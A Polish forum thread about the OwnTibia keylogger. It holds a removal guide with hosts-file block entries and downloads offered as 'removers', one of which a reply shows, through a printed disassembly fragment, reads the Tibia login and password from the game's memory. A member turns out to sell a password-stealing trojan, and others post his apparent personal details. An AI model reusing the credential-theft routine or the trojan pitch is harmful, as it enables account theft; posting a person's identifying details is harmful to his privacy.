Program do usuwania keyloggera OwnTibia [do sprawdzenia]

Witam. Dziś mój kumpel polecił mi tę stronę i od razu po przeczytaniu pierwszego newsa zobaczyłem co jest nie tak :/. Pro evul hakijerzy atakują nawet tutaj. Od razu postanowiłem zamieścić dwa Logger Deletery.
Pierwszy w wersji beta: http://www.speedyshare.com/997270148.html
I drugi w wersji 0.1 http://www.speedyshare.com/586342563.html

wersja 0.1 usuwa również tibia stealera.

PLIKI NIE są mojego autorstwa
Poniżej zamieszczam poradnik 'jak usunąć owntibie RęCZNI'.

Zamieszczam również ten poradnik: Starałeś się zabezpieczyć swój komputer, dobrze chroniłeś hasło i ważne dane, jednak chwila nieuwagi i niewykrywalny keylogger znalazł się na twoim komputerze...Taki scenariusz może spotkać każdego, postaram się więc opisać jak oczyścić swoją maszyną z tego plugastwa.

1.Detekcja
Jeżeli podejrzewamy, że nasz komputer został zainfekowany Owntibią pobieramy narzędzie diagnostyczne hijackthis (stabilna wersję 1.99.1 ) z witryny:
www.merijn.org/files/hijackthis.zip (mirror:www.server.9x.pl/prv/hijackthis.zip )
Następnie uruchamiamy program hijackthis.exe, wybierając opcję „Do a system scan and save a logfile” (Wykonaj skanowane systemu i zapisz plik log’a).
Następnie przyglądamy się log'owi i wyszukujemy wpisów :
C:\WINDOWS\services.exe
O4 - HKLM..\Run: [orcToByloLatwe] C:\WINDOWS\services.exe
lub
O4 - HKLM..\Run: [auto] C:\WINDOWS\services.exe
Owntibia Vip może tworzyć plik o dowolnej nazwie w katalogu C:\Windows należy wtedy sprawdzić jakie pliki powinny być w tym katalogu, a jeżeli jakiś plik nazywa się podobnie do innego, a nie jest plikiem systemowym to na pewno nie jest bezpieczny plik
Uwaga ! W katalogu C:/windows/system32 znajduje się plik servicess.exe jednak to ważny plik systemowy i nie wolno go usuwać.

2.Usuwanie
Jeżeli wykryjemy na naszym komputerze owntibię uruchamiamy windows w trybie awaryjnym(klawisz F8 przy starcie systemu), oraz ponownie uruchamiamy hijackthin tym razem zaznaczamy "ptaszkiem" wpisy owntibii i klikamy na "fix checked". Teraz przechodzimy do katalogu C:\WINDOWS\ i usuwamy plik services. exe używając killbox'a http://www.idg.pl/ftp/pc_8881/Pocket...2.0.0.473.html

Teraz ponownie uruchamiamy komputer i tworzymy log kontrolny by upewnić się o neutralizacji owntibii.

3.Zabezpieczanie na przyszłość
Szukamy pliku hosts: C:\WINDOWS\system32\drivers\etc i otwieramy go edytorem tekstowym.
I dodajemy do niego:
127.0.0.1 owntibia.com
127.0.0.1 vip.owntibia.com
127.0.0.1 87.98.239.19
Co spowoduje zablokowanie możliwości łączenia się do strony gdzie wysyłane są logi ;)

(poradnik NIE jest mojej roboty!)
Miłego sprawiania zawodu hakerom;P

no w plikach nie ma zadnych wirusow... (drugiego mi sie nie chcialo sprawdzac)

moze i sie komus przyda.. po tym newsie na stronie glownej, ale watpie ;)

GieKaA napisał(a)

no w plikach nie ma zadnych wirusow...

Po czym to wnioskujesz? Po przepuszczeniu przez antywirus? Bez żartów..

6 minut na przeczytanie posta i jeszcze sprawdzenie programu? Ja na nowe posty tracę przynajmniej 5 minut, a Ty w 6 już zdążyłeś sprawdzić co w środku piszczy? Coś mi się nie chce wierzyć, że to sprawdziłeś.

yh.. duzo nauki przed toba chlopcze ;)

standardowa analiza to.. otwarcie pliku w jakims edytorze, moze byc i notepad.. na samej gorze zazwyczaj pisze czy jest spakowany, jak jest to go odpakowujesz, szukasz chocby (najprosciej...) wyrazu "http" w pliku i patrzysz dokac prowadzi... ponad to istnieja programy do analizy programow w czasie rzeczywistym (monity co robi - kopiuje sie, dodaje dorejestru itp.) ale ich nieuzywam... po prostu wiem, ze pierwszy plik jest czysty - sam to sprawdz jak masz watpliwosci.. mozna ofc zeskanowac albo i http://analysis.seclab.tuwien.ac.at/

nie bede ci pisal arta o sprawdzaniu plikow -.- google.pl....

Nie musisz mnie uczyć jak się to robi, bo zajmuję się tym zawodowo. Jeśli myślisz, że szukanie w Notatniku napisu 'http' pozwala dać diagnozę 'no w plikach nie ma zadnych wirusow...' to twoja wiarygodność jest.. nie oszukujmy się - żadna.

podalem przyklad "najprostszej" analizy pliku... zadna owntibia ani inne tibijskie syfy nie sa kodowanie, na koncu pliku jest nick na owntibii, adres numeru i adres hasla w pamieci procesu... jezeli takie cos tam jest - to owntibia...

tamten progs nawet odpalilem, nawet zalogowalem sie i polaczen brak... nie wysylalo nic, nie skopiowalo sie, nie dodalo nic do rejestru.. nic -.-

Co nie zmienia faktu, ze moze to byc to inny wirus chociazby.

Mój brak zaufania nie wynika z tego, że twierdzę, że nie umiesz sprawdzić. Może umiesz, może nie; choć po innych formach widać, że udzielasz się - przynajmniej od stycznia tego roku, co do grzebania w Tibii, więc pewnie coś miałeś z tym do czynienia.

Chodzi mi o brak zaufania do pierwszego posta, w którym autor (anonim z resztą) podrzuca pliki niewiadomego pochodzenia i niepewnej (mimo wszystko) treści, do dostępu publicznego.

Po prostu tak szybkie udzielenie odpowiedzi wydało mi się podejrzane, choć nie twierdzę, że nie możliwe.

//Nie chciałem by wyszło, że na Ciebie najeżdżam; sorry, głupio wyszło ;)

Ja bym się zarejestrował ale niewidze tego 'Zarejestrój'
Pierwszy plik pobrany z downloadu TIBIA.ORG.PL
Drugi tibiasoft.com

Speen napisał(a)

Ja bym się zarejestrował ale niewidze tego 'Zarejestrój'
I nie zobaczysz nigdzie, bo to nie serwis dla dysortografów. Za to bez problemu zobaczysz "Zarejestruj", który to link skutecznie przeprowadzi Cię przez system rejestracji.

Ale nie wiem po co.. po to dajemy możliwość pisania anonimom by z tego korzystać. Szczawik.. to, czy ktoś się zarejestruje czy nie nie zmienia jego wiarygodności ani o włos.

Sam wątek.. nie wiem, nie ruszam - może temat tylko poprawię.

@up Admin
Dzięki ale sam 'poradnik' kieruje głównie do Tibijczyków (czyt. News) gdyby była możliwośc edycji przy pisaniu jako gość skasowałbym pierwszy link okazało się iż jest zarażony prosiłbym abyś napisał edita na czerwono typu np. 'Plik numer 1 zarażony'

czlowieku... zastanow sie co ty piszesz -.- ten plik jest czysty jak dupa niemowlecia ;P i nawet dziala...

CODE:0040823A                 push    0               ; lpWindowName
CODE:0040823C                 push    offset aTibiaclient ; lpClassName  adres do ciągu "TibiaClient" - klasa okna klienta Tibii
CODE:00408241                 call    FindWindowA
CODE:00408246                 test    eax, eax
CODE:00408248                 jz      short loc_4082AC
CODE:0040824A                 push    esp             ; lpdwProcessId
CODE:0040824B                 push    eax             ; hWnd
CODE:0040824C                 call    GetWindowThreadProcessId
CODE:00408251                 mov     eax, [esp+34h+var_34]
CODE:00408254                 push    eax             ; dwProcessId
CODE:00408255                 push    0               ; bInheritHandle
CODE:00408257                 push    10h             ; dwDesiredAccess
CODE:00408259                 call    OpenProcess
CODE:0040825E                 mov     ebx, eax
CODE:00408260                 lea     eax, [esp+34h+NumberOfBytesRead]
CODE:00408264                 push    eax             ; lpNumberOfBytesRead
CODE:00408265                 push    7               ; nSize
CODE:00408267                 lea     eax, [esp+3Ch+Buffer]
CODE:0040826B                 push    eax             ; lpBuffer
CODE:0040826C                 push    esi             ; lpBaseAddress
CODE:0040826D                 push    ebx             ; hProcess
CODE:0040826E                 call    ReadProcessMemory ; odczytanie UINu zapisanego jako string
CODE:00408273                 lea     eax, [esp+34h+var_2C]
CODE:00408277                 push    eax             ; lpNumberOfBytesRead
CODE:00408278                 push    1Eh             ; nSize
CODE:0040827A                 lea     eax, [esp+3Ch+var_20]
CODE:0040827E                 push    eax             ; lpBuffer
CODE:0040827F                 push    edi             ; lpBaseAddress
CODE:00408280                 push    ebx             ; hProcess
CODE:00408281                 call    ReadProcessMemory ; odczytanie pass zapisanego jako string, a wszysko to z otwartego klienta Tibii ....

zazuciles kodem czy to deassemblacja ktoregos z plikow - ktorego?

nie, znalazłem to w notatniku

//buachachahcachahca [browar] - M

mam nakrecic film jak to pobieram, wlaczam i nic sie ort!?

A co ma się dziać? Wyskoczyć MessageBox("owned by virus!"); ?

np. program zacznie ingerowac w proces tibii a potem sie polaczy z netem w celu wyslania wykradzionych danych do atakujacego ^^

Odpaliłem notatnik raz jeszcze i poszukałem tych wyrażeń, o których mówiłeś. "http" czy jakoś tak. Wyszło mi jakieś http://giexx.boo.pl/tpt/ i zdaje się to być Twoje ...

nono nieładnie, 15 zł za takie g**no? http://giexx.boo.pl/home/?id=projects&name=TibiaPassThiefer

http://giexx.boo.pl/home/?id=info toż to Twoje dane :o :o

mowilem o pierwszym pliku - jest czysty (drugiego jak juz mowilem, nie chcialo mi sie sprawdzac - bo wiem co to jest - ale niechcialem psuc zabawy mojemu klientowi ;) )

co do adresu oO - domowego.. skad zes to wytrzasnal? :D nigdy niebylem chocby w promieniu 200 km od tamtego miejsca -.-

no a co do szukania 'http' w notepadzie... nie masz szans bo to jest zakodowane, adres wzieles bo odpaliles to cudo na kiju, zalogowales sie na swoje tibijskie konto i przyjzales sie parametrom z jakimi zostal uruchomiony IE, czyz nie? :)

pozdrawiam.. i GZ

Tyle trudu ostatnio sobie hakierzy zadają, a czy w tym serwisie chociaż 2 osoby widziały na oczy tą Tibię? :|

Tez sie zastanawiam wlasnie nad tym. Ja ostatnio nawet czytalem sobie strone glowna gry, z ciekawosci co w tym takiego, ze sie ludki w to tak zagrywaja...

Co do postow GieKaA i jak rozumiem, programu jego autorstwa - zenada...

PS. Disassembler - cudo na kiju [glowa] - ludzie mnie ciagle zaskakuja

GieKaA napisał(a)

no a co do szukania 'http' w notepadzie... nie masz szans bo to jest zakodowane, adres wzieles bo odpaliles to cudo na kiju, zalogowales sie na swoje tibijskie konto i przyjzales sie parametrom z jakimi zostal uruchomiony IE, czyz nie? :)

Wiesz od takich rzeczy, to ja mam takie cudo na kiju co się IDA zwie, a szyfrowanie poprzez dodanie do znaku wartości 0x45 wcale nie jest tak trudno złamać. Uwierz, ani razu nie odpaliłem tego czegoś, chociaż miałem ochotę aby włączyć to na wirtualnej maszynie. Zresztą nie musisz mi wierzyć, nie robię tego dla Ciebie :)

Poza tym, twierdziłeś także, że program jest czysty, a na szczególną uwagę zasługuje fakt, że odezwałeś się już po 5 minutach od momentu stworzenia tematu :) Na prawdę zadziwiają mnie te zbiegi okoliczności :)

Ja dodam, że agent przeglądarki jest identyczny, tylko zakresy neostrady z różnych województw..

No to już przesada takie numery robić.

Ja pikole żeby przez głupią grę której rzeczywiście jak tu ktoś wyżej napisał nigdy na oczy nie widziałem, takie numery robić.

Jestem za tym żeby skoro już macie jego namiary zgłosić go do abuse tej Tibii. Bo jak widać nie boją się tacy niczego. A jeden przykład by się przydał innym.

I żałuję tylko jednego że nie widziałem jego miny i jak mu się w gaciach gęsto zrobiło po tym jak zobaczył swój adres tutaj :D

Marooned napisał(a)

Ja dodam, że agent przeglądarki jest identyczny, tylko zakresy neostrady z różnych województw..

A czy agent jest aż tak unikalny ?? :> Może znalazł jakieś proxy na no-ip albo ma jakieś zombie z opcją proxy. Czy Coyote nie posiada żadnego systemu śledzenia tego co robi użytkownik? Nie da się sprawdzić kiedy gość się wylogował i kiedy logował się ponownie?

Misieksoft napisał(a)

No to już przesada takie numery robić.

tu masz napisane czemu
http://tinyurl.com/ysou4j

PS. Disassembler - cudo na kiju [glowa] - ludzie mnie ciagle zaskakuja

chodzilo o moj progs a nie disassembler

http://allegro.pl/item195096074_195096074.html

chyba tylko udajesz inteligentnego.... ja "qbmacko? chyba cie pogielo... podpowiem ci ze mieszkam nieopodal woj. pomorskiego...

powiedz mi skad wytrzasneles ten link? ja tego nawet niewidzialem ^^ i to, ze wpisujac w google "giexx" jeden z linkow prowadzi do tzw. OTSa Xamash to nie znaczy ze to ja... ktos mi, ze tak powiem "podjebal" nick

Jestem za tym żeby skoro już macie jego namiary zgłosić go do abuse tej Tibii. Bo jak widać nie boją się tacy niczego.

ha ha ha? ja to tylko napisalem, w LEGALNYM KOMPILATORZE (turbo delphi explorer) z LICENCJA KOMERCYJNA i zamiescilem info ze uzywanie do niecnych celow jest NIELEGALNE

I żałuję tylko jednego że nie widziałem jego miny i jak mu się w gaciach gęsto zrobiło po tym jak zobaczył swój adres tutaj

rzeczywiscie... zdziwilem sie jak nigdy.. zaraz sobie znajde aukcje na allegro z uzywanymi stringami i powiem ze tam jest twoj adres oO

GieKaA napisał(a)

http://allegro.pl/item195096074_195096074.html

chyba tylko udajesz inteligentnego.... ja "qbmacko? chyba cie pogielo... podpowiem ci ze mieszkam nieopodal woj. pomorskiego...

powiedz mi skad wytrzasneles ten link? ja tego nawet niewidzialem ^^ i to, ze wpisujac w google "giexx" jeden z linkow prowadzi do tzw. OTSa Xamash to nie znaczy ze to ja... ktos mi, ze tak powiem "podjebal" nick

Jeżeli nie jesteś tym użytkownikiem serwisu Allegro, to zapewne tylko udostępniasz mu swój e-mail aby mógł odbierać maile od kupujących ;)

GieKaA napisał(a)

ha ha ha? ja to tylko napisalem, w LEGALNYM KOMPILATORZE (turbo delphi explorer) z LICENCJA KOMERCYJNA i zamiescilem info ze uzywanie do niecnych celow jest NIELEGALNE

Bez jaj, ktoś miałby wykradać hasła samemu sobie i wysyłać je do siebie? Zawsze możesz popłynąć za współudział bo udostępniasz ludziom serwer do wrzucania logów i sprzedajesz im trojana :) Zreszta, to nie przed nami się bedziesz tłumaczył :)

Bez jaj, ktoś miałby wykradać hasła samemu sobie i wysyłać je samemu sobie? Zawsze możesz popłynąć za współudział bo udostępniasz ludziom serwer do wrzucania logów i sprzedajesz im trojana :) Zreszta, to nie przed nami się bedziesz tłumaczył :)

bardzo wyraznie napisalem ze to tylko i wylacznie do wyciagania WLASNYCH hasel, nie wiem po co wyciagac wlasne hasla - po prostu tak jest, i... jak sie dowiem ze nie wyciagasz wlasnych hasel (jakas skarga bedzie, np. ktos poda numer i haslo - i taki sam wpis bedzie w bazie - byl juz taki przypadek ;) ) - ban...

Jeżeli nie jesteś tym użytkownikiem serwisu Allegro, to zapewne tylko udostępniasz mu swój e-mail aby mógł odbierać maile od kupujących

nigdy nie widzialem tej aukcji, nic tibijskiego nie sprzedawalem ani nie kupowalem, nie znam tego uzytkownika ani nigdy nieprzeprowadzalem z nim transakcji.

teraz wejdz sobie na owntibia.com i powiedz mi jak to dziala? - ze jest legalne? a moje "niby" nie..!? owntibia juz dlugo istnieje i nikomu nic sie niestalo... 40 zl oO - zdzierstwo... u mnie jest 100x mniej userow, 3x taniej a czesto nieplaca mi za to tylko daja cos... bezcennego ;) juz niebede mowil co bo znowu poleca bluzgi, wyrazy nienawisci, zazdrosci itp. itd.

jak myslalem - jak zarobic na programowaniu - tylko to mi wpadlo do glowy, oczywiscie myslalem o wersji VIP mojego trojana ale byl pisany w delphi 7 do ktorej nie mam licencji...

jakis pomysl moze zarzucisz? cos "pozytecznego" na czym mozna choc troche zyskac? ^^

GieKaA napisał(a)

teraz wejdz sobie na owntibia.com i powiedz mi jak to dziala? - ze jest legalne?

A czemu uważasz, że jest legalne? Dlatego, że działa?

GieKaA napisał(a)

jak myslalem - jak zarobic na programowaniu - tylko to mi wpadlo do glowy, oczywiscie myslalem o wersji VIP mojego trojana ale byl pisany w delphi 7 do ktorej nie mam licencji...

Zrób botnet i sprzedawaj czas.

GieKaA napisał(a)

jakis pomysl moze zarzucisz? cos "pozytecznego" na czym mozna choc troche zyskac? ^^

Zbieraj złom.